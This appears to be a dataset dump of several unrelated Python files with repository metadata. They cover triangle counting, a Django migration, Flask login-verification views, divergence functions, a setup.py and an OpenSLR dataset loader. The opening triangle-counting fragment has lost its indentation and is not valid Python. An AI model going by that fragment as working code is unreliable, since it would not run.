response = is_valid_triangle([4, 5, 7])
assert response == True, "it should be 1"
num_triangles = 0
with open("input.txt", "r") as f:
while True:
line = f.readline()
if line == "\n" or line == "":
break
edges = list(map(lambda x: int(x), line.strip().split()))
num_triangles = num_triangles + (1 if is_valid_triangle(edges) else 0)
print("Part1: Total number of triangles is: {}".format(num_triangles))
num_triangles = 0
processed_edges = []
with open("input.txt", "r") as f:
while True:
line = f.readline()
processed_edges.append(list(map(lambda x: int(x), line.strip().split())))
if line == "\n" or line == "":
break
if (len(processed_edges) % 3 == 0):
edges_first = [processed_edges[0][0], processed_edges[1][0], processed_edges[2][0]]
edges_second = [processed_edges[0][1], processed_edges[1][1], processed_edges[2][1]]
edges_third = [processed_edges[0][2], processed_edges[1][2], processed_edges[2][2]]
num_triangles = num_triangles + (1 if is_valid_triangle(edges_first) else 0)
num_triangles = num_triangles + (1 if is_valid_triangle(edges_second) else 0)
num_triangles = num_triangles + (1 if is_valid_triangle(edges_third) else 0)
processed_edges = []
print("Part2: Total number of triangles is: {}".format(num_triangles))
if __name__ == "__main__":
main() | true | true |
f7230013f9c80b482251c11ef79e9fb011a259bc | 973 | py | Python | pretalx_youtube/migrations/0001_initial.py | pretalx/pretalx-youtube | f5a5ae9c9c2d9e3e1e2bb4a6d3e18e970449a96b | [
"Apache-2.0"
] | 1 | 2022-02-09T21:47:34.000Z | 2022-02-09T21:47:34.000Z | pretalx_youtube/migrations/0001_initial.py | pretalx/pretalx-youtube | f5a5ae9c9c2d9e3e1e2bb4a6d3e18e970449a96b | [
"Apache-2.0"
] | 1 | 2022-03-09T18:32:10.000Z | 2022-03-09T18:32:10.000Z | pretalx_youtube/migrations/0001_initial.py | pretalx/pretalx-youtube | f5a5ae9c9c2d9e3e1e2bb4a6d3e18e970449a96b | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.2.4 on 2021-12-15 01:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: creates the YouTubeLink model, which attaches a
    YouTube video ID one-to-one to a pretalx submission.

    Auto-generated by Django; edit with care.
    """
    initial = True
    dependencies = [
        ("submission", "0062_cfp_settings_data"),
    ]
    operations = [
        migrations.CreateModel(
            name="YouTubeLink",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True, primary_key=True, serialize=False
                    ),
                ),
                ("video_id", models.CharField(max_length=20)),
                (
                    "submission",
                    # One link per submission; deleted with its submission.
                    models.OneToOneField(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="youtube_link",
                        to="submission.submission",
                    ),
                ),
            ],
        ),
    ]
| 26.297297 | 76 | 0.458376 |
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
("submission", "0062_cfp_settings_data"),
]
operations = [
migrations.CreateModel(
name="YouTubeLink",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False
),
),
("video_id", models.CharField(max_length=20)),
(
"submission",
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE,
related_name="youtube_link",
to="submission.submission",
),
),
],
),
]
| true | true |
f723014eabd8d19ad1683343d7ed261670ddb067 | 545 | py | Python | papery/site/views.py | radonlab/papery | 1ec8d844adb8cc76cd9ca86a7e5b13a2d1f8967a | [
"MIT"
] | null | null | null | papery/site/views.py | radonlab/papery | 1ec8d844adb8cc76cd9ca86a7e5b13a2d1f8967a | [
"MIT"
] | null | null | null | papery/site/views.py | radonlab/papery | 1ec8d844adb8cc76cd9ca86a7e5b13a2d1f8967a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Copyright (C) 2015, Radmon.
Use of this source code is governed by the MIT license that can be
found in the LICENSE file.
"""
from flask import render_template
from ..auth import auth
from ..blog import blog
def index():
    """Render the site's landing page."""
    return render_template('site/index.html')
def about():
    """Render the static about page."""
    return render_template('site/about.html')
def init_app(app):
    """Register the site's URL rules and blueprints on the Flask app."""
    app.add_url_rule('/', 'site.index', index)
    app.add_url_rule('/about', 'site.about', about)
    app.register_blueprint(auth)
    app.register_blueprint(blog)
| 20.961538 | 66 | 0.699083 |
from flask import render_template
from ..auth import auth
from ..blog import blog
def index():
return render_template('site/index.html')
def about():
return render_template('site/about.html')
def init_app(app):
app.add_url_rule('/', 'site.index', index)
app.add_url_rule('/about', 'site.about', about)
app.register_blueprint(auth)
app.register_blueprint(blog)
| true | true |
f72301b2c63fbdc40c6edfa65c2949f6ab6b9a05 | 1,352 | py | Python | prover.py | hv10/reverseengineering1819 | caf9d9f3d5fc685c062378ebd1a92a8cdd4032e6 | [
"MIT"
] | 1 | 2019-12-01T18:22:20.000Z | 2019-12-01T18:22:20.000Z | prover.py | hv10/reverseengineering1819 | caf9d9f3d5fc685c062378ebd1a92a8cdd4032e6 | [
"MIT"
] | null | null | null | prover.py | hv10/reverseengineering1819 | caf9d9f3d5fc685c062378ebd1a92a8cdd4032e6 | [
"MIT"
] | 1 | 2019-03-14T09:52:16.000Z | 2019-03-14T09:52:16.000Z | import unittest
from functools import wraps
def score_with(score):
    """Decorator factory: award *score* points when the wrapped test passes.

    The wrapped callable must be a method whose class exposes an
    ``_increase_score`` classmethod (see ``Prover``); when the method
    returns a truthy value, *score* is added to that class-level total.
    The original return value is passed through unchanged.
    """
    def decorator(fn):
        @wraps(fn)  # preserve the test's name/docstring for reporting
        def decorated(*args, **kwargs):
            ret = fn(*args, **kwargs)
            if ret:
                # args[0] is the bound instance (self) of the scored scenario.
                args[0].__class__._increase_score(score)
            return ret
        return decorated
    return decorator
class Prover():
    """
    Inherit from me to score a testing scenario.
    Decorate a test_case with "@score_with(amount)" to track
    the points generated!
    All functions with "test" in the beginning of the signature
    will be evaluated upon calling .run() of the instance.
    A child-class should only track points for a _single_ scenario!
    """
    def __init__(self, *args, **kwargs):
        # Reset the class-level score so every scenario starts at zero.
        self.__class__.score = 0

    @classmethod
    def _increase_score(cls, scr):
        cls.score += scr

    def run(self, *args, **kwargs):
        """Invoke every test* method (in dir() order) and report the score."""
        test_method_names = [
            name for name in dir(self)
            if name.startswith('test') and callable(getattr(self, name))
        ]
        for name in test_method_names:
            print(name)
            getattr(self, name)()
        print("Points reached: ", self.__class__.score)
        return self.score
# NOTE(review): instantiating Prover here only resets the class score and
# discards the instance; presumably a placeholder/demo — confirm intent.
if __name__=="__main__":
    Prover()
| 28.166667 | 68 | 0.588757 | import unittest
from functools import wraps
def score_with(score):
def decorator(fn):
def decorated(*args,**kwargs):
ret = fn(*args,**kwargs)
if ret:
args[0].__class__._increase_score(score)
return ret
return decorated
return decorator
class Prover():
def __init__(self,*args,**kwargs):
self.__class__.score = 0
@classmethod
def _increase_score(cls,scr):
cls.score += scr
def run(self, *args,**kwargs):
public_method_names = [
method for method in dir(self)
if callable(getattr(self, method))
if method.startswith('test')
]
for method in public_method_names:
print(method)
getattr(self, method)()
print("Points reached: ",self.__class__.score)
return self.score
if __name__=="__main__":
Prover()
| true | true |
f72301c71bd7efaf6b7a84fe61d922d45b74dd15 | 551 | py | Python | mapping/model/jeffreys.py | syanga/model-augmented-mutual-information | a7c0ccb3b32320e9c45c266d668a879e240d39e3 | [
"MIT"
] | 2 | 2021-06-10T05:45:16.000Z | 2021-11-06T11:44:42.000Z | mapping/model/jeffreys.py | syanga/model-augmented-mutual-information | a7c0ccb3b32320e9c45c266d668a879e240d39e3 | [
"MIT"
] | null | null | null | mapping/model/jeffreys.py | syanga/model-augmented-mutual-information | a7c0ccb3b32320e9c45c266d668a879e240d39e3 | [
"MIT"
] | null | null | null | """ Jeffreys divergences """
import torch
def jeffreys_normal(mu1, lv1, mu2, lv2):
    """Per-sample Jeffreys (symmetric KL) divergence between diagonal Gaussians.

    Inputs are means and log-variances of shape (batch, ...); each is
    flattened to (batch, D) and the divergence is summed over D, so the
    result has shape (batch,).
    """
    mu1 = mu1.view(mu1.shape[0], -1)
    lv1 = lv1.view(lv1.shape[0], -1)
    mu2 = mu2.view(mu2.shape[0], -1)
    lv2 = lv2.view(lv2.shape[0], -1)
    # Quadratic term: squared mean gap weighted by both precisions.
    quad = 0.25 * ((-lv1).exp() + (-lv2).exp()) * (mu1 - mu2) ** 2
    # Variance-ratio term minus the constant so identical inputs give 0.
    ratio = 0.25 * ((lv1 - lv2).exp() + (lv2 - lv1).exp()) - 0.5
    return (quad + ratio).sum(dim=1)
def jeffreys_bernoulli(p, q, eps=1e-5):
    """Element-wise Jeffreys divergence between Bernoulli parameters.

    Both parameter tensors are flattened to (batch, D) and squeezed into
    [eps, 1-eps] to keep the logs finite; the result is per-element
    (no reduction), shape (batch, D).
    """
    squeeze = 1. - 2. * eps
    p = p.view(p.shape[0], -1) * squeeze + eps
    q = q.view(q.shape[0], -1) * squeeze + eps
    # (logit p - logit q), expanded into its four log terms.
    logit_diff = p.log() - q.log() - (1 - p).log() + (1 - q).log()
    return 0.5 * (p - q) * logit_diff
| 36.733333 | 120 | 0.54265 | import torch
def jeffreys_normal(mu1, lv1, mu2, lv2):
mu1, lv1 = mu1.view(mu1.shape[0], -1), lv1.view(lv1.shape[0], -1)
mu2, lv2 = mu2.view(mu2.shape[0], -1), lv2.view(lv2.shape[0], -1)
return (0.25*((-lv1).exp() + (-lv2).exp())*(mu1-mu2)**2 + 0.25*((lv1-lv2).exp() + (lv2-lv1).exp()) - 0.5).sum(dim=1)
def jeffreys_bernoulli(p, q, eps=1e-5):
p = p.view(p.shape[0], -1)*(1.-2.*eps)+eps
q = q.view(q.shape[0], -1)*(1.-2.*eps)+eps
return 0.5*(p-q)*(p.log() - q.log() - (1-p).log() + (1-q).log())
| true | true |
f723022a8a5c862ecf4cb3104f070a25c4cbcdc8 | 2,101 | py | Python | tests/models/v2/rule_test.py | NetApp/santricity-webapi-pythonsdk | 1d3df4a00561192f4cdcdd1890f4d27547ed2de2 | [
"BSD-3-Clause-Clear"
] | 5 | 2016-08-23T17:52:22.000Z | 2019-05-16T08:45:30.000Z | tests/models/v2/rule_test.py | NetApp/santricity-webapi-pythonsdk | 1d3df4a00561192f4cdcdd1890f4d27547ed2de2 | [
"BSD-3-Clause-Clear"
] | 2 | 2016-11-10T05:30:21.000Z | 2019-04-05T15:03:37.000Z | tests/models/v2/rule_test.py | NetApp/santricity-webapi-pythonsdk | 1d3df4a00561192f4cdcdd1890f4d27547ed2de2 | [
"BSD-3-Clause-Clear"
] | 7 | 2016-08-25T16:11:44.000Z | 2021-02-22T05:31:25.000Z | #!/usr/bin/env python
# coding: utf-8
"""
The Clear BSD License
Copyright (c) – 2016, NetApp, Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import unittest
from netapp.santricity.models.v2.rule import Rule
class RuleTest(unittest.TestCase):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    # Try instantiating the model
    def test_rule(self):
        rule_obj = Rule()
        # assertIsNotNone checks identity against None, which is the intent
        # here; assertNotEqual would go through Rule.__ne__ instead.
        self.assertIsNotNone(rule_obj)
| 55.289474 | 845 | 0.764874 |
import unittest
from netapp.santricity.models.v2.rule import Rule
class RuleTest(unittest.TestCase):
def test_rule(self):
rule_obj = Rule()
self.assertNotEqual(rule_obj, None)
| true | true |
f72302a14d482273d46aa7948834d33039045a14 | 3,594 | py | Python | app/main/views/verify.py | alphagov/notify-admin-frontend | 70f2a6a97aefe2432d7a3b54dc1555c030dd3693 | [
"MIT"
] | null | null | null | app/main/views/verify.py | alphagov/notify-admin-frontend | 70f2a6a97aefe2432d7a3b54dc1555c030dd3693 | [
"MIT"
] | null | null | null | app/main/views/verify.py | alphagov/notify-admin-frontend | 70f2a6a97aefe2432d7a3b54dc1555c030dd3693 | [
"MIT"
] | null | null | null | import json
from flask import (
abort,
current_app,
flash,
redirect,
render_template,
session,
url_for,
)
from itsdangerous import SignatureExpired
from notifications_utils.url_safe_token import check_token
from app import user_api_client
from app.main import main
from app.main.forms import TwoFactorForm
from app.models.service import Service
from app.models.user import InvitedOrgUser, InvitedUser, User
from app.utils.login import redirect_to_sign_in
@main.route('/verify', methods=['GET', 'POST'])
@redirect_to_sign_in
def verify():
    """Second-factor SMS verification step after sign-in.

    GET renders the code-entry form; a valid POSTed code activates the
    pending user held in ``session['user_details']``.
    """
    user_id = session['user_details']['id']
    def _check_code(code):
        # Validate the submitted code against the 'sms' verify code the
        # API holds for this user.
        return user_api_client.check_verify_code(user_id, code, 'sms')
    form = TwoFactorForm(_check_code)
    if form.validate_on_submit():
        # Code accepted: the pending sign-in details are no longer needed.
        session.pop('user_details', None)
        return activate_user(user_id)
    return render_template('views/two-factor-sms.html', form=form)
@main.route('/verify-email/<token>')
def verify_email(token):
    """Handle the signed link from the verification email.

    Expired tokens trigger a resend; unknown users 404; already-active
    users are sent to sign-in. Email-auth users are activated directly,
    others continue to the SMS second-factor step.
    """
    try:
        token_data = check_token(
            token,
            current_app.config['SECRET_KEY'],
            current_app.config['DANGEROUS_SALT'],
            current_app.config['EMAIL_EXPIRY_SECONDS']
        )
    except SignatureExpired:
        flash("The link in the email we sent you has expired. We've sent you a new one.")
        return redirect(url_for('main.resend_email_verification'))
    # token contains json blob of format: {'user_id': '...', 'secret_code': '...'} (secret_code is unused)
    token_data = json.loads(token_data)
    user = User.from_id(token_data['user_id'])
    if not user:
        abort(404)
    if user.is_active:
        # An active user's link has already served its purpose.
        flash("That verification link has expired.")
        return redirect(url_for('main.sign_in'))
    if user.email_auth:
        # Email IS the second factor for these users: activate immediately.
        session.pop('user_details', None)
        return activate_user(user.id)
    # Otherwise fall through to SMS verification.
    user.send_verify_code()
    session['user_details'] = {"email": user.email_address, "id": user.id}
    return redirect(url_for('main.verify'))
def activate_user(user_id):
    """Activate and log in the user, then redirect to the right landing page.

    The destination depends on session state: invited service users go to
    that service (or a broadcast tour), invited org users are added to the
    organisation, anyone with an ``organisation_id`` in the session goes to
    that org's dashboard, and everyone else is sent to create a service.
    """
    user = User.from_id(user_id)
    # the user will have a new current_session_id set by the API - store it in the cookie for future requests
    session['current_session_id'] = user.current_session_id
    # Read this before the invited-user branches; it decides the fallback redirect.
    organisation_id = session.get('organisation_id')
    activated_user = user.activate()
    activated_user.login()
    invited_user = InvitedUser.from_session()
    if invited_user:
        service_id = _add_invited_user_to_service(invited_user)
        service = Service.from_id(service_id)
        # Broadcast services get a guided tour; live services get the live variant.
        if service.has_permission('broadcast'):
            if service.live:
                return redirect(url_for('main.broadcast_tour_live', service_id=service.id, step_index=1))
            else:
                return redirect(url_for('main.broadcast_tour', service_id=service.id, step_index=1))
        return redirect(url_for('main.service_dashboard', service_id=service_id))
    invited_org_user = InvitedOrgUser.from_session()
    if invited_org_user:
        user_api_client.add_user_to_organisation(invited_org_user.organisation, user_id)
    if organisation_id:
        return redirect(url_for('main.organisation_dashboard', org_id=organisation_id))
    else:
        return redirect(url_for('main.add_service', first='first'))
def _add_invited_user_to_service(invitation):
    """Attach the signed-in user to the invitation's service; return its id."""
    target_service = invitation.service
    User.from_id(session['user_id']).add_to_service(
        target_service,
        invitation.permissions,
        invitation.folder_permissions,
        invitation.from_user.id,
    )
    return target_service
| 32.378378 | 109 | 0.698943 | import json
from flask import (
abort,
current_app,
flash,
redirect,
render_template,
session,
url_for,
)
from itsdangerous import SignatureExpired
from notifications_utils.url_safe_token import check_token
from app import user_api_client
from app.main import main
from app.main.forms import TwoFactorForm
from app.models.service import Service
from app.models.user import InvitedOrgUser, InvitedUser, User
from app.utils.login import redirect_to_sign_in
@main.route('/verify', methods=['GET', 'POST'])
@redirect_to_sign_in
def verify():
    """Ask for the SMS two-factor code; on success, activate the user."""
    user_id = session['user_details']['id']
    def _check_code(code):
        # Ask the API whether `code` matches the SMS code sent to this user.
        return user_api_client.check_verify_code(user_id, code, 'sms')
    form = TwoFactorForm(_check_code)
    if form.validate_on_submit():
        # Code accepted: drop the pending sign-in details and finish activation.
        session.pop('user_details', None)
        return activate_user(user_id)
    return render_template('views/two-factor-sms.html', form=form)
@main.route('/verify-email/<token>')
def verify_email(token):
    """Handle a click on an emailed verification link.

    Decodes the signed token, looks up the user, and either activates them
    (email-auth users), sends an SMS code and redirects to /verify
    (SMS-auth users), or flashes a message when the link has expired or the
    account is already active.
    """
    try:
        # check_token raises SignatureExpired once EMAIL_EXPIRY_SECONDS has passed.
        token_data = check_token(
            token,
            current_app.config['SECRET_KEY'],
            current_app.config['DANGEROUS_SALT'],
            current_app.config['EMAIL_EXPIRY_SECONDS']
        )
    except SignatureExpired:
        flash("The link in the email we sent you has expired. We've sent you a new one.")
        return redirect(url_for('main.resend_email_verification'))
    # token contains json blob of format: {'user_id': '...', 'secret_code': '...'} (secret_code is unused)
    token_data = json.loads(token_data)
    user = User.from_id(token_data['user_id'])
    if not user:
        abort(404)
    # An already-active account means the link was used before.
    if user.is_active:
        flash("That verification link has expired.")
        return redirect(url_for('main.sign_in'))
    # Email-auth users need no SMS round-trip; activate straight away.
    if user.email_auth:
        session.pop('user_details', None)
        return activate_user(user.id)
    # SMS-auth users: send a text code and continue on the /verify page.
    user.send_verify_code()
    session['user_details'] = {"email": user.email_address, "id": user.id}
    return redirect(url_for('main.verify'))
def activate_user(user_id):
    """Activate and log in the user, then redirect to the right landing page.

    The destination depends on session state: invited service users go to
    that service (or a broadcast tour), invited org users are added to the
    organisation, anyone with an ``organisation_id`` in the session goes to
    that org's dashboard, and everyone else is sent to create a service.
    """
    user = User.from_id(user_id)
    # the user will have a new current_session_id set by the API - store it in the cookie for future requests
    session['current_session_id'] = user.current_session_id
    # Read this before the invited-user branches; it decides the fallback redirect.
    organisation_id = session.get('organisation_id')
    activated_user = user.activate()
    activated_user.login()
    invited_user = InvitedUser.from_session()
    if invited_user:
        service_id = _add_invited_user_to_service(invited_user)
        service = Service.from_id(service_id)
        # Broadcast services get a guided tour; live services get the live variant.
        if service.has_permission('broadcast'):
            if service.live:
                return redirect(url_for('main.broadcast_tour_live', service_id=service.id, step_index=1))
            else:
                return redirect(url_for('main.broadcast_tour', service_id=service.id, step_index=1))
        return redirect(url_for('main.service_dashboard', service_id=service_id))
    invited_org_user = InvitedOrgUser.from_session()
    if invited_org_user:
        user_api_client.add_user_to_organisation(invited_org_user.organisation, user_id)
    if organisation_id:
        return redirect(url_for('main.organisation_dashboard', org_id=organisation_id))
    else:
        return redirect(url_for('main.add_service', first='first'))
def _add_invited_user_to_service(invitation):
    """Add the signed-in user to the invitation's service; return the service id."""
    user = User.from_id(session['user_id'])
    service_id = invitation.service
    user.add_to_service(
        service_id,
        invitation.permissions,
        invitation.folder_permissions,
        invitation.from_user.id,
    )
    return service_id
return service_id
| true | true |
f723039db00b27262888fac5433c80f9b006121c | 858 | py | Python | setup.py | Ricyteach/dxf2shapely | fc6de4e05cbb77e77a5866afdb69cc817bb67027 | [
"MIT"
] | null | null | null | setup.py | Ricyteach/dxf2shapely | fc6de4e05cbb77e77a5866afdb69cc817bb67027 | [
"MIT"
] | null | null | null | setup.py | Ricyteach/dxf2shapely | fc6de4e05cbb77e77a5866afdb69cc817bb67027 | [
"MIT"
] | null | null | null | from setuptools import setup
# Dependency groups for the dxf2shapely package.
# NOTE(review): `setup_requirements` is defined but never passed to setup() —
# presumably intended for a `setup_requires=` argument; confirm before removing.
requirements = ['ezdxf', 'shapely']
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest']

setup(
    name='dxf2shapely',
    version='1.1',
    description='Very limited tool for grabbing line segments from pre-curated dxf files and turning them into shapely Polygons. ',
    author='Ricky L Teachey Jr',
    author_email='ricky@teachey.org',
    url='https://github.com/Ricyteach/dxf2shapely',
    license='MIT',
    packages=['dxf2shapely'],
    install_requires=requirements,
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: English',
        'Programming Language :: Python :: 3.7',
    ],
    test_suite='tests',
    tests_require=test_requirements,
)
| 29.586207 | 131 | 0.664336 | from setuptools import setup
# Runtime dependencies: DXF parsing (ezdxf) and computational geometry (shapely).
requirements = ['ezdxf', 'shapely']
# NOTE(review): defined but never passed to setup(); presumably intended for
# `setup_requires=` — confirm before removing.
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest']
setup(
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: English',
        'Programming Language :: Python :: 3.7',
    ],
    name='dxf2shapely',
    version='1.1',
    packages=['dxf2shapely'],
    url='https://github.com/Ricyteach/dxf2shapely',
    install_requires=requirements,
    license='MIT',
    author='Ricky L Teachey Jr',
    author_email='ricky@teachey.org',
    description='Very limited tool for grabbing line segments from pre-curated dxf files and turning them into shapely Polygons. ',
    test_suite = 'tests',
    tests_require = test_requirements,
)
| true | true |
f723040bf6d789d7bdbfc25e4410c4d49ac627b7 | 20,859 | py | Python | datasets/openslr/openslr.py | PierreColombo/datasets | c22ec7e64edb6596a6ff5894712dea4dc5441de8 | [
"Apache-2.0"
] | 1 | 2021-07-29T06:28:28.000Z | 2021-07-29T06:28:28.000Z | datasets/openslr/openslr.py | norabelrose/datasets | b0511c65b32d1103d34cb5ac9ffb50e9cf387843 | [
"Apache-2.0"
] | null | null | null | datasets/openslr/openslr.py | norabelrose/datasets | b0511c65b32d1103d34cb5ac9ffb50e9cf387843 | [
"Apache-2.0"
] | 1 | 2021-05-04T16:54:23.000Z | 2021-05-04T16:54:23.000Z | # coding=utf-8
# Copyright 2021 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" OpenSLR Dataset"""
from __future__ import absolute_import, division, print_function
import os
import re
from pathlib import Path
import datasets
_DATA_URL = "https://openslr.org/resources/{}"
_CITATION = """\
SLR35, SLR36:
@inproceedings{kjartansson-etal-sltu2018,
title = {{Crowd-Sourced Speech Corpora for Javanese, Sundanese, Sinhala, Nepali, and Bangladeshi Bengali}},
author = {Oddur Kjartansson and Supheakmungkol Sarin and Knot Pipatsrisawat and Martin Jansche and Linne Ha},
booktitle = {Proc. The 6th Intl. Workshop on Spoken Language Technologies for Under-Resourced Languages (SLTU)},
year = {2018},
address = {Gurugram, India},
month = aug,
pages = {52--55},
URL = {http://dx.doi.org/10.21437/SLTU.2018-11},
}
SLR41, SLR42, SLR43, SLR44:
@inproceedings{kjartansson-etal-tts-sltu2018,
title = {{A Step-by-Step Process for Building TTS Voices Using Open Source Data and Framework for Bangla, Javanese, Khmer, Nepali, Sinhala, and Sundanese}},
author = {Keshan Sodimana and Knot Pipatsrisawat and Linne Ha and Martin Jansche and Oddur Kjartansson and Pasindu De Silva and Supheakmungkol Sarin},
booktitle = {Proc. The 6th Intl. Workshop on Spoken Language Technologies for Under-Resourced Languages (SLTU)},
year = {2018},
address = {Gurugram, India},
month = aug,
pages = {66--70},
URL = {http://dx.doi.org/10.21437/SLTU.2018-14}
}
SLR63, SLR64, SLR65, SLR66, SLR78, SLR79:
@inproceedings{he-etal-2020-open,
title = {{Open-source Multi-speaker Speech Corpora for Building Gujarati, Kannada, Malayalam, Marathi, Tamil and Telugu Speech Synthesis Systems}},
author = {He, Fei and Chu, Shan-Hui Cathy and Kjartansson, Oddur and Rivera, Clara and Katanova, Anna and Gutkin, Alexander and Demirsahin, Isin and Johny, Cibu and Jansche, Martin and Sarin, Supheakmungkol and Pipatsrisawat, Knot},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
month = may,
year = {2020},
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
pages = {6494--6503},
url = {https://www.aclweb.org/anthology/2020.lrec-1.800},
ISBN = "{979-10-95546-34-4},
}
SLR69, SLR76, SLR77:
@inproceedings{kjartansson-etal-2020-open,
title = {{Open-Source High Quality Speech Datasets for Basque, Catalan and Galician}},
author = {Kjartansson, Oddur and Gutkin, Alexander and Butryna, Alena and Demirsahin, Isin and Rivera, Clara},
booktitle = {Proceedings of the 1st Joint Workshop on Spoken Language Technologies for Under-resourced languages (SLTU) and Collaboration and Computing for Under-Resourced Languages (CCURL)},
year = {2020},
pages = {21--27},
month = may,
address = {Marseille, France},
publisher = {European Language Resources association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.sltu-1.3},
ISBN = {979-10-95546-35-1},
}
SLR71, SLR71, SLR72, SLR73, SLR74, SLR75:
@inproceedings{guevara-rukoz-etal-2020-crowdsourcing,
title = {{Crowdsourcing Latin American Spanish for Low-Resource Text-to-Speech}},
author = {Guevara-Rukoz, Adriana and Demirsahin, Isin and He, Fei and Chu, Shan-Hui Cathy and Sarin, Supheakmungkol and Pipatsrisawat, Knot and Gutkin, Alexander and Butryna, Alena and Kjartansson, Oddur},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
year = {2020},
month = may,
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.lrec-1.801},
pages = {6504--6513},
ISBN = {979-10-95546-34-4},
}
SLR80
@inproceedings{oo-etal-2020-burmese,
title = {{Burmese Speech Corpus, Finite-State Text Normalization and Pronunciation Grammars with an Application to Text-to-Speech}},
author = {Oo, Yin May and Wattanavekin, Theeraphol and Li, Chenfang and De Silva, Pasindu and Sarin, Supheakmungkol and Pipatsrisawat, Knot and Jansche, Martin and Kjartansson, Oddur and Gutkin, Alexander},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
month = may,
year = {2020},
pages = "6328--6339",
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.lrec-1.777},
ISBN = {979-10-95546-34-4},
}
SLR86
@inproceedings{gutkin-et-al-yoruba2020,
title = {{Developing an Open-Source Corpus of Yoruba Speech}},
author = {Alexander Gutkin and Işın Demirşahin and Oddur Kjartansson and Clara Rivera and Kọ́lá Túbọ̀sún},
booktitle = {Proceedings of Interspeech 2020},
pages = {404--408},
month = {October},
year = {2020},
address = {Shanghai, China},
publisher = {International Speech and Communication Association (ISCA)},
doi = {10.21437/Interspeech.2020-1096},
url = {https://dx.doi.org/10.21437/Interspeech.2020-1096},
}
"""
_DESCRIPTION = """\
OpenSLR is a site devoted to hosting speech and language resources, such as training corpora for speech recognition,
and software related to speech recognition. We intend to be a convenient place for anyone to put resources that
they have created, so that they can be downloaded publicly.
"""
_HOMEPAGE = "https://openslr.org/"
_LICENSE = ""
_RESOURCES = {
"SLR35": {
"Language": "Javanese",
"LongName": "Large Javanese ASR training data set",
"Category": "Speech",
"Summary": "Javanese ASR training data set containing ~185K utterances",
"Files": [
"asr_javanese_0.zip",
"asr_javanese_1.zip",
"asr_javanese_2.zip",
"asr_javanese_3.zip",
"asr_javanese_4.zip",
"asr_javanese_5.zip",
"asr_javanese_6.zip",
"asr_javanese_7.zip",
"asr_javanese_8.zip",
"asr_javanese_9.zip",
"asr_javanese_a.zip",
"asr_javanese_b.zip",
"asr_javanese_c.zip",
"asr_javanese_d.zip",
"asr_javanese_e.zip",
"asr_javanese_f.zip",
],
"IndexFiles": ["asr_javanese/utt_spk_text.tsv"] * 16,
"DataDirs": ["asr_javanese/data"] * 16,
},
"SLR36": {
"Language": "Sundanese",
"LongName": "Large Sundanese ASR training data set",
"Category": "Speech",
"Summary": "Sundanese ASR training data set containing ~220K utterances",
"Files": [
"asr_sundanese_0.zip",
"asr_sundanese_1.zip",
"asr_sundanese_2.zip",
"asr_sundanese_3.zip",
"asr_sundanese_4.zip",
"asr_sundanese_5.zip",
"asr_sundanese_6.zip",
"asr_sundanese_7.zip",
"asr_sundanese_8.zip",
"asr_sundanese_9.zip",
"asr_sundanese_a.zip",
"asr_sundanese_b.zip",
"asr_sundanese_c.zip",
"asr_sundanese_d.zip",
"asr_sundanese_e.zip",
"asr_sundanese_f.zip",
],
"IndexFiles": ["asr_sundanese/utt_spk_text.tsv"] * 16,
